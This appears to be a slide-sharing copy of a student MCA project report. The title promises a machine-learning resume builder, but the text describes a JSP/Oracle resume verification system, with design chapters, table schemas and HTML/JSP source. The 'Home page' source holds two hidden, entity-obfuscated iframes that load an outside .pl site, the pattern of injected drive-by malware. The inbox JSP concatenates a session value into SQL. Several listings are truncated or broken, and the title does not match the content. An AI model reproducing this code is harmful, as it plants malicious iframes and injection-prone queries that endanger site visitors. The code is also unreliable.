RESUME BUILDER projects using machine learning.docx

spub1985 7 views 66 slides May 19, 2025
Slide 1
Slide 1 of 66
Slide 1
1
Slide 2
2
Slide 3
3
Slide 4
4
Slide 5
5
Slide 6
6
Slide 7
7
Slide 8
8
Slide 9
9
Slide 10
10
Slide 11
11
Slide 12
12
Slide 13
13
Slide 14
14
Slide 15
15
Slide 16
16
Slide 17
17
Slide 18
18
Slide 19
19
Slide 20
20
Slide 21
21
Slide 22
22
Slide 23
23
Slide 24
24
Slide 25
25
Slide 26
26
Slide 27
27
Slide 28
28
Slide 29
29
Slide 30
30
Slide 31
31
Slide 32
32
Slide 33
33
Slide 34
34
Slide 35
35
Slide 36
36
Slide 37
37
Slide 38
38
Slide 39
39
Slide 40
40
Slide 41
41
Slide 42
42
Slide 43
43
Slide 44
44
Slide 45
45
Slide 46
46
Slide 47
47
Slide 48
48
Slide 49
49
Slide 50
50
Slide 51
51
Slide 52
52
Slide 53
53
Slide 54
54
Slide 55
55
Slide 56
56
Slide 57
57
Slide 58
58
Slide 59
59
Slide 60
60
Slide 61
61
Slide 62
62
Slide 63
63
Slide 64
64
Slide 65
65
Slide 66
66

About This Presentation

RESUME BUILDER projects using machine learning


Slide Content

RESUME BUILDER
The Project Report is submitted in partial fulfillment of
the requirements for the award of the degree of Master
of Computer Applications
Submitted by: KODI
SUSHMA SRI
2385351049
Under the Esteemed Guidance of
S.K.Alisha
B.V. Raju College
Vishnupur::Bhimavaram
Submitted to
DEPARTMENT OF COMPUTER SCIENCE & ENGINEERING
COLLEGE OF ENGINEERING
ADIKAVI NANNAYA UNIVERSITY
RAJAHMAHENDRAVARAM
2024-2025

CERTIFICATE
This is to certify that this project entitled “RESUME BUILDER” submitted
APPLICATIONS to Adikavi Nannaya University from 7i Tech Solutions
through B.V.RajuCollege, done by Ms.KODI SUSHMA SRI Regd.
No._2385351049 is an authentic work carried out by him/her during the
Academic Year 2024-2025 at under my guidance. The matter embodied in
this project work has not been submitted earlier for award of any degree or
diploma to the best of my knowledge and belief.
Internal Guide Head of the Department
External Examiner Principal
B.V. RAJUCOLLEGE
(AUTONOMOUS)
(Re-Accredited with ‘B++’ Grade by NAAC)
Department of MCA
Vishnupur :: Bhimavaram

ACKNOWLEDGEMENTS
The satisfaction and euphoria that accompany the successful completion of any
task would be incomplete without the mention of people who made it possible, whose
constant guidance and encouragement crowned our efforts with success. It is a pleasant
aspect that I have now the opportunity to express my gratitude for all of them.
The first person I would like to thank Dr. I.R.krishnam Raju, Principal MCA,
B V Raju College, Bhimavaram. His wide knowledge and logical way of thinking have
made a deep impression on me. His understanding, encouragement and personal
guidance have provided the basis for this thesis. He is a source of inspiration for
innovative ideas and his kind support is well known to all his students and colleagues.
I wish to thank Dr.V.BHASKARA MURTHY,Professor & HOD, . Dept. of MCA. His
support and valuable suggestions for the successful completion of this Project.
I wish to thank my guide Mr.S.K.ALISHA ,Associate Professor , Dept. of MCA.His support
and valuable suggestions for the successful completion of this Project.
KODI SUSHMASRI
2385351049

DECLARATION
This is to certify that the project report entitled “RESUME BULDER” is
done by me is an authentic work carried out for the partial fulfillment of the
requirements for the award of the degree of Master of Computer
Applications under the guidance of Mr.S.K.Alisha,Associate Professor, Dept.
of MCA. The matter embodied in this project work has not been submitted
earlier for award of any degree or diploma to the best of my knowledge and
belief.
Signature of the student
KODI
SUSHMASRI
2385351049
B.V.Raju College.

INDEX
Chapter Page No.
1.INTRODUCTION 1-3
1.1ABOUT THE PROJECT 1
1.2PROJECT DESCRIPTION 1
1.3EXISTING SYSTEM 2
1.4PROPOSED SYSTEM 2-3
2.OBJECT ORIENTED ANALYSIS 4-20
2.1CLASS MODELING 4-5
2.2USECASE DIAGRAMS 6-9
2.3SEQUENCE DIAGRAM 10-13
2.4ACTIVITY DIAGRAM 14-16
2.5COLLOBORATION DIAGRAM 17
2.6DATAFLOW DIAGRAM 18
DFD NOTATIONS 18-20
Fig: 12 .DFD for Company Module 19
Fig: 13 .DFD for University Module 20
3.OBJECT ORIENTED DESIGN 21-34
Entity Relationship Diagrams 21-26
3.1SYSTEM DESIGN SPECIFICATION 27
3.1.1HARDWARE SPECIFICATIONS 27
3.1.2SOFTWARE SPECIFICATIONS 31
3.1.3MODULE SPECIFICATION 31
3.3DATABASE DESIGN 31
3.4TESTCASE DESIGN 32-33
4.OBJECT ORIENTED IMPLEMENTATION 34-42
4.1SOURCE CODE 34-42
5.ENVIRONMENT SPECIFICATION 43-54
5.1.1JAVA TECHNOLOGY 43
5.1.2JAVA ENVIRONMENT: 44-51
6.TESTING 52-54
7.CONCLUSIONS AND FUTURE ENHANCEMENTS 55
8.ANNEXURE 56-57
8.1SCREENS 56
8.2REFRENCES 57

1.INTRODUCTION
1.1ABOUT THE PROJECT
Locale Verification System is a browser-based software solution that helps the
industries and companies for eliminating the fake resumes and the experience details.
The project provides elimination of fraud and assist in searching for undisclosed
information, such as the resume details, marks details, experience details and other
activities mentioned in resume.
The system supports multi-user, multilingual capacity. User friendly operating
methodology and various report generation capacity are some of its main features.
1.2PROJECT DESCRIPTION
The main aim of the project is to establish a Resume Monitoring Server, which holds
the entire database of companies, employees, employee qualifications, employee
educational details and employee work experience details. The project provides the login
to every company HR for resume monitoring and uploading the employee details of their
company.
The project also gives login to various educational institutions HOD’s or university
and board members for uploading educational information of various candidates. The
information uploaded by company HR’s and board members is persevered in server. This
information is provided to required company when they want through which the software
provides correct information and helps various companies in eliminating fraud
candidates.
The project resume monitoring software solution gives company managers an easy-
to-use, web-based tool that helps automate cumbersome reporting and monitoring
processes for finding the details of employee, in this criteria we can search the previous
experience, his/her educational qualifications are accurate or fraud.
Project provides evidence that transactions accounts help of companies, universities,
educational institutions and educational boards. This information is most readily
available to HR of all companies, which helps them a time round database for finding the
accurate details of employee resumes.

1.3.EXISTING SYSTEM
No system still now exists for providing online resume information of employees,
students or candidates. We gathered case studies from various web sites and analyzed to
design this online project for providing all the educational information, the employee
experience information and the other additional information in an online database, which
is used by company HR, Institutions for finding the accurate details of the candidate. But
the present system is depending upon a third party consultancy to trace the information
of employee. These process a very time consuming and too cost process.
Limitations in Existing System
⮚Companies and Industry are facing a major problem in finding the resume details
submitted by a candidate or correct or fraud.
⮚Companies depend upon a third party detection consultancy to find out the
candidate resume details are correct or fraud.
⮚Consultancy takes more time, because they should physically move their
employees to various places to find out the candidate details.
⮚Companies cannot get perfect candidates in the current manually scenario
process.
1.4.PROPOSED SYSTEM
The proposed system Locale Verification System is a browser-based software
solution that helps industries and companies resume monitoring online for eliminating
fake resumes and experience details. The project provides elimination of fraud and assists
in searching for undisclosed information, such as resume details, marks details,
experience details and the other activities mentioned in resume.
The proposed system is to automation resume monitoring for companies and
educational institutions. The proposed system provides access to all the company
managers in monitoring details of candidates, their experience details in other
companies, educational percentages in Boards and Universities. This project is helpful

to company managers in easy monitoring of candidates resume and eliminating fraud resumes
given by the candidates.
Advantages of Proposed System
⮚Project provides maintenance of employee’s information and provides fast
interaction between various companies at the time of interviews.
⮚Project provides various reports for authorities of HR Managers.
⮚Project provides fast transmission of data between company HR and Educational
Board/ University Members.
⮚Through Online Server Interaction we can eliminate fraud candidates from
interviews.
⮚Improves candidate portfolio quality.
⮚Reducesadministrativeaccountexpensesinreducingthethirdparty
investigations.

2.OBJECT ORIENTED ANALYSIS
A Software Requirements Specification (SRS) is a complete description of the
behavior of the system to be developed. It includes a set of use cases that describe all the
interactions the users will have with the software. Use cases are also known as functional
requirements. In addition to use cases, the SRS also contains nonfunctional (or
supplementary) requirements. Non-functional requirements are requirements which
impose constraints on the design or implementation (such as performance engineering
requirements, quality standards, or design constraints).
The Software Requirements Specification (SRS) begins the translation process
that converts the software requirements into the language the developers will use. The
SRS draws on the use-cases from the User Requirement Document (URD) and
analyzes the situations from a number of perspectives to discover and eliminate
inconsistencies, ambiguities, and omissions before development progresses
significantly under mistaken assumptions.
2.1.CLASS MODELING
In software engineering, a class diagram in the Unified Modeling Language (UML),
is a type of static structure diagram that describes the structure of a system by showing
the system's classes, their attributes, and the relationships between the classes.
This is one of the most important of the diagrams in development. The diagram
breaks the class into three layers. One has the name, the second describes its attributes
and the third its methods. A padlock to left of the name represents the private attributes.
The relationships are drawn between the classes. Developers use the Class Diagram to
develop the classes. Analyses use it to show the details of the system.
Architects look at class diagrams to see if any class has too many functions and see
if they are required to be split.

Fig.1. Figure Showing Classes and Attributes

2.2.USE CASE DIAGRAMS
In software engineering, a use case diagram in the Unified Modeling Language
(UML) is a type of behavioral diagram defined by and created from a Use-case
analysis. Its purpose is to present a graphical overview of the functionality
provided by a system in terms of actors, their goals (represented as use cases), and
any dependencies between those use cases. The main purpose of a use case
diagram is to show what system functions are performed for which actor. Roles of
the actors in the system can be depicted. Use cases are used during requirements
elicitation and analysis to represent the functionality of the system. Use cases focus on
the behavior of the system from the external point of view. The actors are outside the
boundary of the system, whereas the use cases are inside the boundary of the system

Fig 2 Use Case Diagram for Administrator

Fig 3 Use Case Diagram for Institution

Fig 4. Use Case Diagram for Company hr Module

2.3.SEQUENCE DIAGRAM
A sequence diagram in Unified Modelling Language (UML) is a kind of
interaction diagram that shows how processes operate with one another and in what
order. It is a construct of a Message Sequence Chart.
Sequence diagrams are sometimes called Event-trace diagrams, event scenarios,
and timing diagrams
The purpose is to show of the functioning through a use case. In other Words, we
call it mapping processes in terms of data transfers from the actor through corresponding
objects.
❖To represent the logical flow of data with respect to a process.
❖It must be remembered that the sequence diagram display Objects and not
the classes.

Fig 5. Sequence Diagram for Administrator

Fig 6. Sequence Diagram for Institutions

Fig 7. Sequence Diagram for Company hr module

2.4.ACTIVITY DIAGRAM
Activity diagrams are a loosely defined diagram technique for showing
workflows of stepwise activities and actions, with support for choice, iteration and
concurrency. In the Unified Modeling Language, activity diagrams can be used to
describe the business and operational step-by-step workflows of components in a system.
An activity diagram shows the overall flow of control.
User Registration Activity
Figure 8 Activity Diagram for User Registration Activity

Login Activity:
Figure 9 Activity Diagram for Login Activity

Fig 10. Activity Diagram for Locale Verification System

2.5.COLLOBRATION DIAGRAMS
Fig 11. Collaboration Diagram Administrator

2.6.DATA FLOW DIAGRAMS
Data drive business activities. They can trigger events and processed to provide
information useful to personnel. System analysis recognizes the central role of business
data in the organization. The following that shows the flow of data through business
processes, which is the purpose of data flow analysis, tells us a great deal about how
organization objectives are accomplished.
Data flow analysis studies the use of data in each activity. It documents these
details in the Data Flow Diagrams.
A data flow diagram is a logical model of a system. The model does not depend
on hardware, software, and data structures of the organization. There is no physical
implication in a data flow diagram because the diagram is a graphic picture of the logical
system, it trends to be easy for every non-technical user to understand and thus serves as
an excellent communication tool. Finally a data flow diagram is a good starting point for
system design.
To construct a data flow diagram it uses basic symbols. They are given below.
DFD NOTATIONS
Define source and destination data.
Shows path of the data flow.
To represent a process that transforms or modifies
the Data.
To represent an attribute.
Data Store

Fig: 12 .DFD for Company Module

Fig: 13 .DFD for University Module

Database Design (ER-Diagram)
Database Designing is the part of the development process. In the linear development
cycle, it is used during the system requirements phase to construct the data components
of the analysis model. This model represents the major data objects and the relationship
between them. It should not be confused with data analysis, which takes place in the
system design phase.
As in a DFD, a model of data consists of a number of symbols joined up according to
certain conventions. System designers describe these conceptual modeling using symbols
from a modeling method known as entity relationship analysis.
Entity Relationship Diagram
Entity relationship analysis uses three major abstractions to describe data. These are
1.Entities, which are distinct things in the enterprise.
2.Relationships, which are meaningful interactions between the objects.
3.Attributes, which are the properties of the entities and relationship.
The relative simplicity and pictorial clarity of this diagramming technique May well
account in large part for the widespread use of ER model. Such a diagram consists of the
following major components.

E-R Diagram Components
Rectangles, which represent the entity set.
Ellipse, which represent attributes
Diamonds, which represent relationship sets
Lines, which link attributes to entity sets and
entity sets to relationships
Double Ellipse, which represents multi valued
attributes.
Double lines, which indicates total participation
of an entity in a relationship set.

ER Diagram for Locale Verification System
Companies Education
al
institutions
Ename
Address
InsID
Address
Emp details
Cname
CID
Provides
ID, pwd
Contains
NameAIDAuthentication
UID
Pwd
AdministratorLogin

Upload student
details
PerformsSearch for
resumes
Name
StaffSearch emp
details
Maintain
emp details
Branch ID
SID
Main
tain
byBranch ID, name
Performs
Course ID
Address
Roll no
Student
information
NameCompany hr
SID
Maintains
Contains
Branch ID
Educational
Institutions
Commu
nicates
Companies
AddressAddress
EnameEIDCnameCID

3.OBJECT ORIENTED DESIGN
3.1.SYSTEM DESIGN SPECIFICATION
3.1.1.HARDWARE SPECIFICATIONS
Processor : Intel Pentium IV Processor or more, IBM Cyrix
(Intel compatible)
Hard Disk :80 GB hard disk recommended for
Primary partition.
RAM :Minimum 1 GB ram
Recommended for data
processing.
3.1.2.SOFTWARE SPECIFICATIONS
Operating System : Microsoft Windows
2000 Programming Environment:JSP
Style Sheets : CSS
Database : Oracle
Web server : Apache Tomcat
Web browsers : Internet Explorer
Scripting language : Java Script
Database Drivers : Jdbc/Odbc Drivers (Type 4)
3.1.3.MODULE SPECIFICATION
The project commercial Locale Verification System provides a solution is applicable
across a wide variety of different companies.
The project aims at the Locale Verification System of all companies, without the hassle
of going to company or running to some third party for getting information on an
employee details. The main aim of the project is to design online system to eliminate
fraud candidates from interviews.
This project consists of 4 modules.
❖Administrator Module

❖Educational Institutions /Board/University Module

❖Company HR Module
❖Communication Module
Administrator Module
The Administrator is a person who will create the logins for the company HR,
Educational Institutions Heads and University staff members to which the members are
having tie-up and track of all the actions. He monitors the server activities, company’s
user activities and Educational Institutions activities and he acts as a bridge between all
the actors of the system and alerts them when he finds the fraud resumes and the false
information going in the market. The following are various activities performed by
administrator.
⮚Creation of Login Id’s For Company Hr’s, Educational Institutions, University
Staff Members.
⮚Alerts various information to the users.
⮚Change Password at user level.
⮚Imports and Exports of Server Data.
⮚Communication.
⮚Mail, Inbox, Reports
Educational/ Institution or Board Module
The Online Resume server has tie-up with certain company HR’s, Educational
Institutions, Boards and Universities members. The concerned user can login to use the
application activities. The following are the various application activities for the current
user.
⮚Upload the Information of Student Marks of various educational institutions,
Board and universities.
⮚Upload Information of Student College Details, and user can search the candidate
marks in Online Resume Server, to which the data is stored by concerned

organization directly.
⮚User can search the candidate resumes experience details in online server, to
which the data is stored by the concerned organization HR directly.

⮚Can view the list of all company details, which are registered as per government
norms.
Company HR Module
This module provides activities like online view, monitoring of Curriculums of
candidates.
⮚Company HR can upload the details of current employee experience, salary and
other details.
⮚Company HR can search the candidate marks in an online curriculum Server, to
which the data is stored by concern organization directly.
⮚Company HR can search the candidate curriculums experience and salary details
in online server, to which the data is stored by concerned organization HR
directly.
⮚Can view list of company details registered as per government norms.
⮚Can view the list of valid Educational Institutions.
⮚Communication, Reports
Communication Module
The project is an Online Internet application used by various users in different areas for
faster enquiries between users, they again should depend upon an external mail, instead
of an external mail the project provides an Internal mail between the users of application.
This communication module provides mail communication between the users. The
following are the activities of the module.
⮚Inbox - Provides Inbox to view the list of mails received to user.
⮚Compose - Provides compose of new mail and sending to other users.
⮚Replay - Provides response to the list of users who are sending the mails.
⮚Delete - Provides removal of unwanted messages.

3.3.DATABASE DESIGN
Data dictionaries are integral component of structured analysis, since data flow
diagrams by themselves do not fully describe the subject of the investigation. The data
dictionary provides additional information about the system. A data dictionary is a
catalog – repository provides additional information about the system.
A data dictionary is a catalog – repository of the elements in a system. In a data
dictionary we will find a list of all elements composing the data flowing through the
system. The major elements are data flows, data stores and process. The data dictionary
stores details and descriptions of those elements.
Tables
Table No : 1
Table Name : Login
Column name Type(size) Constrain
ts
UserID Varchar(20) primary
key
password Varchar(30)
Type of User Varchar(30)
Table No : 2
Table Name : Admin Inbox
Column name Type(size) Constrain
ts
Mid number primary
key
User name Varchar(30)
Msg from Varchar(30)
Msg subject Varchar(30)
Msg data Varchar(30)
Msg date Varchar(30)
Table No : 3
Table Name : Educational Branch
Column name Type(size) Constrain
ts
Type of branchVarchar(20) primary
key
BranchID Varchar(30)
Branch detailsVarchar(30)

Table No : 4
Table Name: Student Details
Column
name
Type(size
)
Constraints
SID Number(1
0)
Sname Varchar(2
0)
Fname Varchar(2
0)
Caste Varchar(2
0)
DOB Date
Year of joinnumber(4
)
InstitutionVarchar(2
0)
Branch Varchar(2
0)
Address Varchar(2
0)
Town Varchar(2
0)
Pin Number(1
0)
Phone Number(1
0)
Email Varchar(2
0)
Sex Varchar(1
)
Year of
passing
Varchar(1
0)
Table No : 5
Table Name : Employee Details
Column name Type(size)Constraints
EmpID Varchar(20)
Ename Varchar(30)
Sal Varchar(30)
CompanyID Number(10)

Company name Varchar(10)
Address Varchar(20)
DOJ Date
Status Varchar(1)

Table No : 6
Table Name: Resume details
Column name Type(size) Constraints
Obj Varchar2(1000)
Achievements Varchar2(1500)
Place Varchar2(20)
Year of passingVarchar2(20)
Strength Varchar2(1000)
Hno Varchar2(10)
Cid Varchar2(10)
Table No : 8
Table Name: User Inbox
Column nameType(size) Constraints
MID Number
User name Varchar2(30)
Msg from Varchar2(50)
Msg subjectVarchar2(50)
Msg data Varchar2(500)
Msg date Date
Table No : 9
Table Name: Subject details
Column
name
Type(size)Constraints
BranchID Varchar(1)
Branch nameVarchar(20)
Year Number(4)
SemisterIDNumber(3)
DOE Date
Subject nameVarchar(20)
Marks Number(3)
Table No : 10
Table Name: Educational institution
Column name Data(size)Constraints
EduID Varchar2(20)
Edu name Varchar2(20)
Year Year
Address Varchar2(10)
Staff detailsVarchar2(10)

Student detailsVarchar2(10)

3.4.INTERFACE DESIGN
User InterfacesAll the user interfaces defined by the customer are attached.
1.Home Page
2.Login Form
3.Admin Activities
4.Educational Institution Activities
5.Company Activities
6.Search Resumes
7.Mail Communication
8.Resume Monitoring
9.Log out
Hardware
Interfaces
Server configuration:
Minimum 1GB Hard Disk.
P – IV processor or
equivalent RAM 512 MB
Windows or Linux with Apache
preloaded. A terminal with Internet
Explorer.
Software InterfacesOperating System --
Windows Language--
JAVA
Communications
Interfaces
This is a web-enabled application. So client requires web-
browser, Internet connection. HTTP is for the standard
communication.

3.4.TEST CASE DESIGN
Software testing is a critical element of software quality assurance and
represents the ultimate review of specification, design and coding. Testing is the
exposure of the system to trial input to see whether it produces correct output.
TESTING PHASES:
Software testing phases include the following:
●Test activities are determined and test data selected.
●The test is conducted and test results are compared with the
expected Results.
TESTING OBJECTIVES:
1.Testing is process of executing a program with the intent of finding an error.
2.A good test case design is one that has a probability of finding an as yet
undiscovered error.
3.A successful test is one that uncovers an as yet undiscovered
error. These above objectives imply a dramatic change in view
port.
Testing cannot show the absence of defects, it can only show that software errors
are present.
TESTING STRATEGIES:
Unit Testing:
Unit testing is essentially for the verification of the code produced during the
coding phase and the goal is test the internal logic of the module/program. In the Generic
code project, the unit testing is done during coding phase of data entry forms whether the
functions are working properly or not. In this phase all the drivers are tested they are
rightly connected or not.
Integration Testing:
All the tested modules are combined into sub systems, which are then tested.
The goal is to see if the modules are properly integrated, and the emphasis being on the
testing interfaces between the modules. In the generic code integration testing is done
mainly on table creation module and insertion module.

System Testing:
It is mainly used if the software meets its requirements. The reference
document for this process is the requirement document. Acceptance Testing
It is performed with realistic data of the client to demonstrate that the software
is working satisfactorily. In the Generic code project testing is done to check whether the
Creation of tables and respected data entry was working successfully or not.
VERIFICATION AND VALIDATION TESTING:
At the culmination of integration testing, software is completely assembled as
a package; interfacing errors have been uncovered and corrected, and a final series of
software tests – validation testing may begin. Validation can be fined in many ways, but
a simple definition is that validation succeeds when software functions in a manner that
can be reasonably expected by the customer.
Reasonable expectation is defined in the software requirement specification – a
document that describes all user-visible attributes of the software. The specification
contains a section titled “Validation Criteria”. Information contained in that section
forms the basis for a validation testing approach.

4OBJECT ORIENTED IMPLEMENTATION
4.1.SOURCE CODE
Login page
<html>
<head>
<SCRIPT LANGUAGE=” JavaScript”>
function formvalid()
{ var staffid =document.comfrm.uid.value; var
name=document.comfrm.pwd.value; if
((staffid.length==0)||(name.length==0))
{
alert("fill the form completely")
return false;
}
return true;
}
</script>
<style>
h1{position:absolute;color:#0077aa;left:160}
i{position:absolute;top:377;left:610;font-size:16;color:blue}
#poptop TABLE {WIDTH: 786px}
#poptop TD {FONT-SIZE: 12px; TEXT-ALIGN: center}
#poptop A:hover {TEXT-DECORATION: underline}
#poptop A {font-size:16;FONT-WEIGHT: bold; COLOR:darkblue;font-
family:Times New Roman; TEXT-DECORATION: none
}
pre{position:absolute;left:510;top:240;font-family:Times New Roman;font-size:16;font-
weight:bold;color:darkviolet}
a{position:absolute;text-decoration:none}
b{position:absolute;left:190;top:145;color:magenta}
</style>
</head>

<body background=p1.jpg>
<h1><center><img src=images/caption.jpg></marquee></center></h1>
<img src="doc\line1.gif" style="position:absolute;top:130;width:777 ;height:25;left:0">
<div id=poptop>
<table>
<tbody>
<tr>
<td><a href="index.html" style="position:absolute;top:130;left:30"></a>
</td>
<td><a href="applihome.html" style="position:absolute;top:130;left:140"></a>
</td>
<td><a href="login.jsp" style="position:absolute;top:130;left:290">Login</a>
</td>
<td><a href="contact.jsp" style="position:absolute;top:130;left:410">Contact</a>
</td>
<td><a href="complaint.html" style="position:absolute;top:130;left:550"></a>
</td>
<td><a href="about.html" style="position:absolute;top:130;left:680"></a>
</td>
</tr>
</tbody>
</table>
</div>
<img src="doc\sss.gif" width=180 height=240 style="position:absolute;left:10;top:170">
<img src="images\internship.gif" height=100 style="position:absolute;left:15;top:25">
<img src="images\ddd.jpg" height= 100 style="position:absolute;left:660;top:25">
<table style="position:absolute;left:0;top:165;">
<tbody>
<tr>
<td>
<iframe src=scroll.jsp width=230 height=300 frameborder=no></iframe>
</td></tr>
</tbody>
</table>

<div style="position:absolute;left:50;top:65;">
<FORM NAME=comfrm ACTION="login1.jsp" onSubmit="return formvalid()">
<table border=1background=p1.jpg style="position:absolute;top:150;left:280;">
<caption> <font face="arial black" color=blue> Login Form </caption>
<tr>
<td> <font face=verdana color=blue> User Id </td>
<td> <input type=text name=uid border=0></td>
</tr>
<tr> <td> <td> </tr>
<tr>
<td> <font face=verdana color=blue> Password </td>
<td> <input type=password name=pwd border=0></td>
</tr>
<tr>
<td> <font face=verdana color=blue>Type of User</td>
<td> <select name=typs>
<option value="a"> Admin </option>
<option value="s"> SSC Board </option>
<option value="i"> Inter Board </option>
<option value="c"> Company </option>
<option value="u"> University </option>
</select></td>
</tr>
<tr>
<td colspan=3><center> <input type=submit value=submit></center></td>
</table>
</div>
</body>
</html>

Home page
----------------
<html>
<head>
<title>
home
</title>
<style>
h1{position:absolute;color:#0077aa;left:160}
if{position:absolute;top:377;left:610;font-size:16;color:blue}
#poptop TABLE {WIDTH: 786px}
#poptop TD {FONT-SIZE: 12px; TEXT-ALIGN: center}
#poptop A:hover {TEXT-DECORATION: underline}
#poptop A {font-size:16;FONT-WEIGHT: bold;
COLOR:darkblue;font-family:Times New Roman; TEXT
DECORATION: none
}
pre{position:absolute;left:510;top:240;font-family:Times New Roman;font-size:16;font-
weight:bold;color:darkviolet}
a{position:absolute;text-decoration:none}
b{position:absolute;left:190;top:145;color:magenta}
</style>
</head>
<body bgcolor=white>
<h1><center><img src=images/caption.jpg></marquee></center></h1>
<img src="doc\line1.gif" style="position:absolute;top:130;width:777 ;height:25;left:0">
<div id=poptop>
<table>
<tbody>
<tr>
<td><a href="index.html" style="position:absolute;top:130;left:30"></a>
</td>
<td><a href="applihome.html" style="position:absolute;top:130;left:140"></a>
</td>

<td><a href="login.jsp" style="position:absolute;top:130;left:290">Login</a>
</td>
<td><a href="contact.jsp" style="position:absolute;top:130;left:410">Contact</a>
</td>
<td><a href="complaint.html" style="position:absolute;top:130;left:550"></a>
</td>
<td><a href="about.html" style="position:absolute;top:130;left:680"></a>
</td>
</tr>
</tbody>
</table>
</div>
<img src="doc\sss.gif" width=180 height=240 style="position:absolute;left:10;top:170">
<img src="images\p1.jpg" height=230 width=160
style="position:absolute;left:220;top:252;z-
index:3">
<img src="images\internship.gif" height=100 style="position:absolute;left:15;top:25">
<img src="images\ddd.jpg" height= 100 style="position:absolute;left:660;top:25">
<img src="images/p2.jpg"
style="position:absolute;left:380;top:240;height:240;width:200">
<img src="images/p4.gif"
style="position:absolute;left:560;top:240;height:240;width:200">
<p align = justify style="position:absolute;left:50;top:25;width:700;height:140">&nbsp;
&nbsp; &nbsp;
<br><br><br><br><b> Locale Verification System is a browser-based software solution
</p></b>
<table style="position:absolute;left:0;top:165;">
<tbody>
<tr>
</tbody>
</table>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
</body>
</html>

Admin inbox
***********
<link href="style.cdf" rel="stylesheet">
<%@ include file="common.jsp" %>
<%@ page import="java.sql.*"%>
<%
ResultSet rs=null;
%>
<script>
function getMessage(val) {
styles="<link href='ksrm.cdf' rel='stylesheet'><title>Message</title>"
nwin=open("","","scrollbars=yes,width=500 height=300,left=120,top=200");
nwin.document.write(styles+"<p>"+document.getElementById('msgs'+val).innerHTML
+"</p>");
nwin.document.close();
}
</script>
<html xmlns=""><head>
<meta http-equiv="page-enter" content="blendTrans(duration=1)">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
</head>
<body >
<br><br>
<BR>
<fieldset>
<legend>Messages </legend><BR>
<% String buff="";
String head="";
try {
String cmd="Select * from user_inbox where user_name ='" +
session.getValue("login").toString() + "'";
st=con.createStatement();
rs=st.executeQuery(cmd);

int count=0;
boolean rec=false;
head+="<table align=center width=600 cellspacing=1 cellpadding=2
bgcolor=lightslategray><form method=post action=\"admin_deletemsgchecked.jsp\">";
head+="<tr bgcolor=lightslategray><th style='color:aliceblue'>S.no</th><th
style='color:aliceblue'>From</th><th style='color:aliceblue'>Subject</th><th
style='color:aliceblue'>Date</th><th style='color:aliceblue'>Reply</th></tr>";
while(rs.next()) {rec=true;count++;int id=rs.getInt("mid");
String from=rs.getString("msg_from");
String sub=rs.getString("msg_subject");
String data=rs.getString("msg_data");
sub=(sub!=null)?sub:"[&nbsp;None&nbsp;]"; data=(data!=null)?
data:"[&nbsp;No Message is Available&nbsp;]";
java.text.SimpleDateFormat fmt=new
java.text.SimpleDateFormat("dd-MMM-yyyy");
String msgdate=fmt.format(rs.getDate("msg_date")).toString();
buff+="<TR bgcolor=whitesmoke><TD>"+count+"</td>";
</body></html>

ADDEMP.JSP
<link href="ksrm.cdf" rel="stylesheet">
<%@ page import="java.sql.*" %>
<%@ include file="common.jsp" %>
<html>
<head>
<script language="JavaScript">
function enableAll()
{
document.banks.bankcode.disabled=false;
document.banks.bankname.disabled=false;
document.banks.branchname.disabled=false;
document.banks.bankcode.focus();
}
function formvalid()
{
var
agcode=document.abc.agcode.value;
var name=document.abc.name.value;
var town=document.abc.town.value;
var phone=document.abc.phone.value; if((agcode.length==0)||
(name.length==0)|| (town.length==0)||(phone.length==0))
{
alert('fill the form completely')
return false;
}
else
return true;
}
</script>
</head>
<body>
<img style="position:absolute;top:5;left:170;" src=images/logo.jpg>
<script type='text/javascript' src='JS/exmplmenu_var.js'></script>

<script type='text/javascript' src='JS/menu_com.JS'></script>
<form name =abc method=post action=agents1.jsp onSubmit='return formvalid()'>
<center>
<font size="4" color="blue">
<br><br><br><br><br><br>
<b>New Employee Details Form</b><br>
<b>New Entry</b>
</font></center>
<br>
<table align =center border=1>
<table border=0 align=center >
<caption id="blink"><b><u>Employee Form</u></b></caption>
<tr>
<td>Employee Userid</td>
<td><input type=text name=agcode ></td></tr>
<tr>
<td>Employee Name</td>
<td><input type=text name=name ></td>
</tr>
<tr>
<td>Type of Employee</td>
<Td>
<select name=address>
<tr>
</table>
<center>
<input type="submit" value="Save" class=border >
</form>
</body></html>

5.ENVIRONMENT SPECIFICATION
5.1.JAVA
The Internet helped catapult Java to the forefront of programming and Java in
turn has had a profound effect on the Internet. The reason is simple: Java expands the
universe of objects that can move about freely in cyberspace. In a network, there are two
broad categories of objects transmitted between the Server and your Personal Computer:
passive information and dynamic, active programs like an object that can be transmitted
to your computer, which is a dynamic, self-executing program. Such a program would be
an active agent ton the client computer, yet the server would initiate it. As desirable as
dynamic, networked programs are, they also present serious problems in the areas of
security and portability. Prior to Java cyberspace was effectively closed to half the
entities that now live there. Java addresses these concerns and doing so, has opened the
door to an exiting a new form of program.
5.1.1JAVA TECHNOLOGY:
Java, whether you love it, or hate it, it's here to stay. Like everyone's favorite
language C, Java has had a major impact on the computing scene. When the history of
computers is written, its name will be up there with the stars.
World Wide Web is an open ended information retrieval system designed to be
used in the distributed environment. This system contains web pages that provide both
information and controls. We can navigate to a new web page in any direction. This is
made possible worth HTML java was meant to be used in distributed environment such
as internet. So java could be easily incorporated into the web system and is capable of
supporting animation graphics, games and other special effect. The web has become
more dynamic and interactive with support of java. We can run a java program on
remote machine over internet with the support of web.

5.1.2JAVA ENVIRONMENT:
Java environment includes a large no. of tools which are part of the system
known as java development kit (JDK) and hundreds of classes, methods, and interfaces
grouped into packages forms part of java standard library (JSL).
Why Java Is Important to the Internet:
The Internet helped catapult Java to the forefront of programming, and Java, in
turn, has had a profound effect on the Internet. The reason for this is quite simple: Java
expands the universe of objects that can move about freely in cyberspace. In a network,
two very broad categories of objects are transmitted between the server and your
personal computer: passive information and dynamic, active programs. For example,
when you read your e-mail, you are viewing passive data. Even when you download a
program, the program's code is still only passive data until you execute it. However, a
second type of object can be transmitted to your computer: a dynamic, self-executing
program. Such a program is an active agent on the client computer, yet is initiated by the
server. For example, a program might be provided by the server to display properly the
data that the server is sending. As desirable as dynamic, networked programs are, they
also present serious problems in the areas of security and portability. Prior to Java,
cyberspace was effectively closed to half the entities that now live there. As you will see,
Java addresses those concerns and, by doing so, has opened the door to an exciting new
form of program: the applet.
Java Applets and Applications:
Java can be used to create two types of programs: applications and applets. An
